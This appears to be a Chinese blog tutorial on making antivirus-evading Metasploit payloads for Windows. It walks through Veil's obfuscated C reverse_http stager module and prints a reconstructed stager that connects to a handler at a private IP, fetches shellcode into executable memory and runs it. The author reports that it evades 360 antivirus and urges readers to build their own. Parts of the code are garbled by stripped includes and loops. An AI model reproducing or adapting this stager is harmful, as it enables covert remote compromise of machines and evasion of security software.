手工打造Windows下编译的免杀Payload

第二 ：pyinstaller虽然支持使用64位的python打包，但是打包出来的程序也是64位的（这让32位的系统情何以堪）； 第三 ：编译打包后的Payload奇大无比（大约3-7MB）

，

打包时可以选择生成一个文件（所有运行所须的库及dll都打包到exe中），也可以选择生成多个文件（Payload和所需的库分开。Payload大约1M多，剩下的十几个文件又让人感到头痛，难道让我一个一个上传不成）。最后虽然用这种方法获得了免杀的Payload，但是还是不得不放弃这种方法。

既然无捷径可走了，那还是静下心来去翻一翻Veil吧。下载Veil，在Veil根目录下的/modules/payloads文件件中看到了生成各种免杀Payload的.py文件。共7类：

auxiliary c cs native powershell python ruby

先从比较熟悉的“c”看起吧，在/modules/payloads/c/meterpreter/下有4个用来生成c代码的py文件。

rev_http.py rev_http_service.py rev_tcp.py rev_tcp_service.py

""" Obfuscated, pure C windows/meterpreter/reverse_http. Implements various randomized string processing functions in an attempt to obfuscate the call tree. Also compatible with Cobalt-Strike's Beacon. Original reverse_tcp inspiration from https://github.com/rsmudge/metasploit-loader Module built by @harmj0y """ import random from modules.common import helpers class Payload:  def __init__(self):   # required options   self.shortname = "meter_rev_http"   self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"   self.language = "c"   self.extension = "c"   self.rating = "Excellent"   # optional   # options we require user ineraction for- format is {Option : [Value, Description]]}   self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],         "LPORT" : ["8080", "Port of the metasploit handler"],         "compile_to_exe" : ["Y", "Compile to an executable"]}  def generate(self):   sumvalue_name = helpers.randomString()   checksum_name = helpers.randomString()   winsock_init_name = helpers.randomString()   punt_name = helpers.randomString()   wsconnect_name = helpers.randomString()   # the real includes needed   includes = [ "#include             " , "#include                 ", "#include                     ", "#include                      ", "#include           "]   # max length string for obfuscation   global_max_string_length = 10000   max_string_length = random.randint(100,global_max_string_length)   max_num_strings = 10000   # TODO: add in more string processing functions   randName1 = helpers.randomString() # reverse()   randName2 = helpers.randomString() # doubles characters   stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i                                                         ", "#include                ", "#include                                                                                             

可以看到generate()最终返回了混淆后的c代码，在生成的过程中LHOST和LPORT(默认8080)由用户定义（上面代码加粗的部分）。

c代码中几乎所有的变量都使用helpers.randomString()来随机生成，代码中的整型数字则使helpers.obfuscateNum()来进行混淆（例如：5会写成2*2+1或是5*1+0）。

通过还原变量名称、整理代码，最终我得到了c_rev_http的源码。

整理后：

#define _WIN32_WINNT 0x0500 #include              #include         #include         #include                      #include                          #include                              #include                                  char* Name2(char* s) {   char *result =  malloc(strlen(s)*2+1);   int i;   for (i=0; i                                                                                <2)   {     for(i=0;i<3;++i)     {       string_var[i] = characters[rand() % (sizeof(characters)-1)];     }     for(i=0;i                                                h_addr, target->h_length);   sock.sin_family = AF_INET;   sock.sin_port = htons(9527);//rev_http Port   if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )     punt(my_socket);   return my_socket; }  int main(int argc, char * argv[]) {   char * buffer;   int i;   char* char_array1[8776];   for (i = 0;  i < 8776;  ++i)     char_array1[i] = malloc (9719);   winsock_init();   char* char_array2[118];   SOCKET my_socket = wsconnect();   for (i = 0;  i < 118;  ++i)     char_array2[i] = malloc (9721);   char request_buf[200];   sprintf(request_buf, "GET /%s HTTP/1.1/r/nAccept-Encoding: identity/r/nHost: 192.168.199.124:9527/r/nConnection: close/r/nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT/r/n/r/n", checksum());   send(my_socket,request_buf, strlen( request_buf ),0);   Sleep(300);   buffer = VirtualAlloc(0, 1000000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);   char* char_array3[8279];   for (i=0; i<8776; ++i)   {     strcpy(char_array1[i], Name1());   }   char * buf_counter = buffer;   int bytes_read;   do   {     bytes_read = recv(my_socket, buf_counter, 1024, 0);     buf_counter += bytes_read;   }   while ( bytes_read > 0 );   for (i = 0;  i < 8279;  ++i)     char_array3[i] = malloc (9549);   for (i=0; i<118; ++i)   {     strcpy(char_array2[i], Name2());   }   closesocket(my_socket);   WSACleanup();   ((void (*)())strstr(buffer, "/r/n/r/n") + 4)();   for (i=0; i<8279; ++i)   {     strcpy(char_array3[i], Name3());   }   return 0; }                                                                                                                                     

因上面的代码是使用GNU/GCC来编译的，所以在windows下直接使用vc6编译会报一大堆错误。没办法，拿起大学时代那本《C语言程序设计与应用教程》回顾了半天，修改代码，最终通过编译。

编译后体积185kb（可加壳缩小体积），虽然比metasploit生成的要大，但已经满足要求。

使用同样的方法，依次还原了c_rev_http_service、c_rev_tcp、c_rev_tcp_service、cs_rev_http、cs_rev_https、cs_rev_tcp的源码（powershell和ruby的还没有看）。

编译生成对应的payload比较一下体积并测试免杀和连接效果：

体积对比：

可见C#代码编译后的Payload更小，竟然只有5kb…… cs_rev_tcp使用了三个不同版本的.NET csc编译。

免杀效果：(360安全卫士最新木马库查杀)

连接测试：

想在windows上获得msf免杀payload的同学赶快行动起来吧！